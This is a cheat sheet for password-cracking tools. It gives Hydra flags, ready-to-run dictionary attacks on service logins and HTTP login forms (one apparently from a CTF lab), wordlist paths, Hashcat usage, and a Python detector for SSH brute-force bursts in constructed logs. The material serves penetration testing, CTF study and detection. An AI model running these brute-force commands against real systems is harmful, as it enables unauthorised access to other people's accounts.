Cracking Utilities


            

Hydra

Hydra is an open source password cracking tool that takes a password word list and a username or username list and tries them against a service's login. Hydra is typically used for dictionary attacks.

Usage:

hydra -T 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 192.168.0.1 protocol

-T #: Number of parallel connections to targets (threads). This is the overall count; -t # sets the number of parallel connections per target

-l user: Username

-L file: Username wordlist

-p password: Password

-P file: Password wordlist

-vV: Verbosity (5 is max)

192.168.0.1: Target IP

protocol: Protocol to use (Ex. ftp, ssh)

Example HTTP login form brute force:

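The quoted http-post-form argument has three parts separated by colons: the path of the login form, the POST body with ^USER^ and ^PASS^ as placeholders, and a string that appears in the response to a failed login.

php:

hydra -l milesdyson -P /root/Desktop/log1.txt 10.10.180.153 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:incorrect"

no php:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-post-form "/admin/:user=^USER^&pass=^PASS^:Username or password incorrect"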

Commonly used wordlists with Hydra:

/usr/share/wordlists/rockyou.txt - Common password wordlist. It may be shipped as a .gz file, in which case you need to decompress it with gunzip

/usr/share/wordlists/fasttrack.txt - Common password wordlist

/usr/share/wordlists/metasploit/unix_users.txt - Username wordlist

/usr/share/wordlists/metasploit/unix_passwords.txt - Password wordlist
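
Seen from the target's logs, a Hydra dictionary run against SSH is a burst of failed logins from one source within a few seconds. The detector below is an added example, not part of the original cheat sheet; the log lines are constructed, and the ISO timestamp format, the threshold and the window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd lines (ISO timestamps assumed): a burst against "mike"
# from 203.0.113.7, and one ordinary mistyped password from another host.
SAMPLE_LOG = """\
2024-05-01T10:00:01 sshd[811]: Failed password for mike from 203.0.113.7 port 40112 ssh2
2024-05-01T10:00:01 sshd[812]: Failed password for mike from 203.0.113.7 port 40114 ssh2
2024-05-01T10:00:02 sshd[813]: Failed password for mike from 203.0.113.7 port 40116 ssh2
2024-05-01T10:00:02 sshd[814]: Failed password for mike from 203.0.113.7 port 40118 ssh2
2024-05-01T10:00:03 sshd[815]: Failed password for mike from 203.0.113.7 port 40120 ssh2
2024-05-01T10:00:04 sshd[816]: Accepted password for mike from 203.0.113.7 port 40122 ssh2
2024-05-01T10:04:30 sshd[901]: Failed password for anna from 198.51.100.20 port 51500 ssh2
2024-05-01T10:04:41 sshd[902]: Accepted password for anna from 198.51.100.20 port 51502 ssh2
"""

LINE = re.compile(r"^(\S+) sshd\[\d+\]: (Failed|Accepted) password for "
                  r"(?:invalid user )?(\S+) from (\S+) port \d+")

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag sources with >= threshold failed logins inside a sliding window."""
    recent = defaultdict(deque)  # source IP -> timestamps of recent failures
    alerts = {}                  # source IP -> {"failures", "guessed_account"}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts, outcome, user, src = datetime.fromisoformat(m[1]), m[2], m[3], m[4]
        q = recent[src]
        while q and ts - q[0] > window:  # expire failures older than the window
            q.popleft()
        if outcome == "Failed":
            q.append(ts)
            if len(q) >= threshold:
                alert = alerts.setdefault(src, {"failures": 0, "guessed_account": None})
                alert["failures"] = max(alert["failures"], len(q))
        elif src in alerts and q:
            # Success while the burst is still in the window: a guess likely worked.
            alerts[src]["guessed_account"] = user
    return alerts

if __name__ == "__main__":
    for src, alert in detect_bruteforce(SAMPLE_LOG).items():
        print(src, alert)
```

An alert with a non-empty guessed_account is the case to escalate first: the account's password should be reset and the source blocked.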


            

Hashcat

Hashcat is a "password recovery tool" similar to john in functionality. Hashcat has a lot of options; I would recommend looking at them either in your terminal (man hashcat) or online.

Usage:

hashcat -m hashtype hash_file wordlist

-m hashtype: Specifies hashing algorithm to crack, list available at manpages.org/hashcat

hash_file: Hash file to crack

  If your hash type is salted, the salt will usually be separated from the hash with a : in the hash file

wordlist: Wordlist to use